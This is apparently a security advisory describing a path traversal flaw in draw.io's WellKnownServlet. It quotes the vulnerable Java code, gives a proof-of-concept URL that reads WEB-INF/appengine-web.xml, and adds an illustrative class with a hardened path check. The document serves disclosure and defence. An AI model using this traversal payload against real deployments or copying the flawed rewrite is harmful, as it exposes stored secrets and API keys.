# Description
The `WellKnownServlet` is vulnerable to path traversal.
This allows reading local files.
For example, the files in `WEB-INF` that contain secrets and API keys can be read.
https://github.com/jgraph/drawio/blob/v18.0.4/src/main/java/com/mxgraph/online/WellKnownServlet.java#L40-L66
```java
String uri = request.getRequestURI().replace("/.", "/");

if (uri.toLowerCase().contains(".json"))
{
    response.setContentType("application/json");
}

// Serve whatever was requested from .well-known
try (InputStream in = getServletContext().getResourceAsStream(uri))
{
    if (in == null)
    {
        response.sendError(404);
        return;
    }

    byte[] buffer = new byte[8192];
    int count;

    while ((count = in.read(buffer)) > 0)
    {
        response.getOutputStream().write(buffer, 0, count);
    }

    response.getOutputStream().flush();
    response.getOutputStream().close();
}
```

# Proof of Concept
Access the following URL (relative to the actual host of the web application).
```txt
/.well-known/.../WEB-INF/appengine-web.xml
```
This will disclose the contents of `appengine-web.xml`:
```xml
truefalsejava8F11
```
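
The following is an added example, not code from the report or from the draw.io code base. It reproduces the servlet's `replace("/.", "/")` rewrite on constructed request paths and puts a stricter check beside it. The class name, the `safeMapping` helper and the `/well-known/` base directory are assumptions made for illustration.

```java
import java.util.Optional;

public class WellKnownPathCheck {
    // Assumption: after the servlet's replace(), legitimate requests map under this directory.
    static final String BASE = "/well-known/";

    // The mapping used by the servlet snippet above: every "/." becomes "/".
    static String servletMapping(String requestUri) {
        return requestUri.replace("/.", "/");
    }

    // Hardened variant (hypothetical helper): validate the string that would
    // actually reach getResourceAsStream(), i.e. the result of the rewrite.
    static Optional<String> safeMapping(String requestUri) {
        String mapped = servletMapping(requestUri);
        if (!mapped.startsWith(BASE) || mapped.indexOf('\\') >= 0) {
            return Optional.empty();
        }
        for (String segment : mapped.substring(1).split("/", -1)) {
            // Empty, "." and ".." segments have no place in a resource name.
            if (segment.isEmpty() || segment.equals(".") || segment.equals("..")) {
                return Optional.empty();
            }
        }
        return Optional.of(mapped);
    }

    public static void main(String[] args) {
        // Constructed request paths: one legitimate, two traversal attempts.
        String[] constructed = {
            "/.well-known/security.txt",
            "/.well-known/.../WEB-INF/appengine-web.xml",
            "/.well-known/../WEB-INF/appengine-web.xml",
        };
        for (String uri : constructed) {
            System.out.printf("%-45s servlet -> %-42s hardened -> %s%n",
                uri, servletMapping(uri),
                safeMapping(uri).map(p -> "serve " + p).orElse("404"));
        }
    }
}
```

The second input shows the root cause: the rewrite itself turns `/...` into `/..`, so validation has to run on the rewritten string rather than on the raw request URI.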